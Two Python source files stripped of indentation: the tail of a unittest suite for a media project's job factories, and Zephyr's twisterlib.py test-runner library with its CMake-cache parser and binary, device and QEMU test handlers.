self.assertTrue(len(p.completed) < 10)
self.assertEqual(len(p.errored_jobs), 1)
self.assertEqual(f.call_count, 1)
self.assertEqual(p.errored_jobs[0].status, 'error')
# When process is called again it should run the remaining unfinished
# jobs.
p.process()
# Then
self.assertEqual(p.status, 'error')
self.assertEqual(len(p.completed), 10)
for i, j in enumerate(p.completed):
self.assertEqual(j.status, 'success')
j.func.assert_called_once_with(i)
self.assertEqual(j.result, i)
self.assertEqual(len(p.errored_jobs), 1)
self.assertEqual(p.errored_jobs[0].status, 'error')
self.assertEqual(f.call_count, 2)
class TestFactoryBase(unittest.TestCase):
def setUp(self):
self._temp = tempfile.mkdtemp()
self.root = os.path.join(self._temp, 'test')
self.root1 = os.path.join(self._temp, 'test1')
make_data(self._temp)
def tearDown(self):
shutil.rmtree(self._temp)
class TestCommandFactory(TestFactoryBase):
def test_command_factory_commands(self):
# Given.
cf = CommandFactory(dest=self.root1, input_extension='.py',
output_extension='.rst',
command="echo $input $output")
p = Project(name='test', path=self.root)
p.scan()
# When
jobs = cf.make_jobs(p.keys(), p)
# Then.
self.assertEqual(len(jobs), 1)
job = jobs[0]
m = p.get('hello.py')
dest = os.path.join(self.root1, 'hello.rst')
expect = ('echo %s %s' % (m.path, dest)).replace('\\', '\\\\')
self.assertEqual(job.args, [expect.split(), m.path, dest])
def test_command_factory_jobs(self):
# Given.
import sys
command = """\
%r -c 'import shutil;shutil.copy("$input", "$output")'\
""" % sys.executable
cf = CommandFactory(dest=self.root1, input_extension='.py',
output_extension='.rst',
command=command, copy_timestamps=True)
p = Project(name='test', path=self.root)
p.scan()
# When
jobs = cf.make_jobs(p.keys(), p)
job = jobs[0]
job.run()
job.thread.join()
# Then.
self.assertEqual(len(jobs), 1)
self.assertEqual(job.status, 'success')
m = p.get('hello.py')
dest = os.path.join(self.root1, 'hello.rst')
self.assertTrue(os.path.exists(dest))
self.assertEqual(cf._done[dest], True)
s_stat = os.stat(m.path)
d_stat = os.stat(dest)
self.assertTrue(abs(s_stat.st_mtime - d_stat.st_mtime) < 2)
self.assertTrue(abs(s_stat.st_ctime - d_stat.st_ctime) < 2)
jobs = cf.make_jobs(p.keys(), p)
self.assertEqual(len(jobs), 0)
# When.
data = dump(cf)
cf1 = load(data)
# Then.
for attr in cf.__dict__.keys():
self.assertEqual(getattr(cf1, attr), getattr(cf, attr))
def test_command_factory_ignores_non_existing_paths(self):
# Given.
cf = CommandFactory(dest=self.root1, input_extension='.py',
output_extension='.rst',
command="echo $input $output")
p = Project(name='test', path=self.root)
p.scan()
os.remove(os.path.join(self.root, 'hello.py'))
# When
jobs = cf.make_jobs(p.keys(), p)
# Then.
self.assertEqual(len(jobs), 0)
class TestPythonFunctionFactory(TestFactoryBase):
def test_python_function_factory(self):
# Given.
from textwrap import dedent
code = dedent("""
def process(relpath, media, dest):
media.tags['completed'] = True
media.tags['args'] = "%s %s"%(relpath, dest)
""")
factory = PythonFunctionFactory(code=code, dest=self.root1)
p = Project(name='test', path=self.root)
p.add_tags([TagInfo(name='args', type='string')])
p.scan()
# When
jobs = factory.make_jobs(p.keys(), p)
for job in jobs:
job.run()
job.thread.join()
# Then.
self.assertEqual(len(jobs), 5)
for key in p.keys():
media = p.get(key)
self.assertEqual(media.tags['completed'], True)
expect = "%s %s" % (key, self.root1)
self.assertEqual(media.tags['args'], expect)
# When
jobs = factory.make_jobs(p.keys(), p)
# Then
self.assertEqual(len(jobs), 0)
# When.
data = dump(factory)
f1 = load(data)
# Then.
# The func should not be dumped.
self.assertEqual(f1._func, None)
self.assertNotIn('_func', data[1])
f = factory
for attr in ['code', '_done']:
self.assertEqual(getattr(f1, attr), getattr(f, attr))
class TestTaggerFactory(TestFactoryBase):
def test_tagger_factory_tags_known_tags(self):
# Given.
code = 'import sys; print("args:"+sys.argv[1]'\
'+"\nlength:10\ncompleted:yes\n")'
command = "python -c %r" % code
factory = TaggerFactory(command=command)
p = Project(name='test', path=self.root)
p.add_tags(
[
TagInfo(name='args', type='string'),
TagInfo(name='length', type='int')
]
)
p.scan()
# When
jobs = factory.make_jobs(p.keys(), p)
for job in jobs:
job.run()
job.thread.join()
# Then.
self.assertEqual(len(jobs), 5)
for job in jobs:
self.assertEqual(job.status, 'success')
for key in p.keys():
media = p.get(key)
self.assertEqual(media.tags['completed'], True)
expect = "%s" % (media.path)
self.assertEqual(media.tags['args'], expect)
self.assertEqual(media.tags['length'], 10)
# When
jobs = factory.make_jobs(p.keys(), p)
# Then
self.assertEqual(len(jobs), 0)
# When.
data = dump(factory)
f1 = load(data)
# Then.
# The _tag_types should not be dumped.
self.assertEqual(f1._tag_types, None)
self.assertNotIn('_tag_types', data[1])
f = factory
for attr in ['command', '_done']:
self.assertEqual(getattr(f1, attr), getattr(f, attr))
def test_tagger_factory_skips_unknown_tags(self):
# Given.
code = 'import sys; print("\nlength:10\nxxx:yes\n")'
command = "python -c %r" % code
factory = TaggerFactory(command=command)
p = Project(name='test', path=self.root)
p.scan()
# When
jobs = factory.make_jobs(p.keys(), p)
for job in jobs:
job.run()
job.thread.join()
# Then.
self.assertEqual(len(jobs), 5)
for key in p.keys():
media = p.get(key)
self.assertTrue('length' not in media.tags)
self.assertTrue('xxx' not in media.tags)
self.assertEqual(media.tags['completed'], False)
if __name__ == '__main__':
unittest.main()
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
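# Minimal usage sketch for ExecutionCounter, kept as comments so importing this
# module is unchanged. Each counter is a multiprocessing.Value, and each
# property getter/setter acquires the underlying Value's lock:
#
#   results = ExecutionCounter(total=100)
#   results.done += 1
#   results.passed += 1
#   print(results.done, "/", results.total)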
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
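# Illustrative example of CMakeCacheEntry.from_line() (the cache lines below
# are made up):
#
#   entry = CMakeCacheEntry.from_line('FOO:STRING=a;b;c', line_no=1)
#   entry.name    # 'FOO'
#   entry.value   # ['a', 'b', 'c']  -- ';' splits STRING/INTERNAL into a list
#
#   CMakeCacheEntry.from_line('ENABLE_FEATURE:BOOL=ON', 2).value   # 1 (truthy)
#   CMakeCacheEntry.from_line('// a comment line', 3)              # None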
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
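# Typical CMakeCache usage (the file path and key names below are
# illustrative, not taken from this module):
#
#   cache = CMakeCache.from_file('build/CMakeCache.txt')
#   cache.get('SOME_ENTRY', default=None)
#   cache.get_list('SOME_LIST_ENTRY')   # always a list (possibly empty)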
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
        # Encapsulate the terminate functionality so we do it consistently
        # wherever we might want to terminate the proc. We need
        # try_kill_process_by_pid because of how both newer ninja (1.6.0 or
        # greater) and .NET / renode work: newer versions of ninja don't seem
        # to pass SIGTERM down to their children, so we kill by PID instead.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or not (d.serial or d.serial_pty):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
        # Sometimes a test instance fails to execute and leaves an empty
        # results dictionary; fill the results with BLOCK so the instance is
        # still included in the final report.
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
        process execution time to approximate the time spent in the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
                        # It's possible we polled nothing because the host did
                        # not schedule enough CPU time to the QEMU process
                        # during p.poll(this_timeout).
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
        if pid:
            try:
                os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
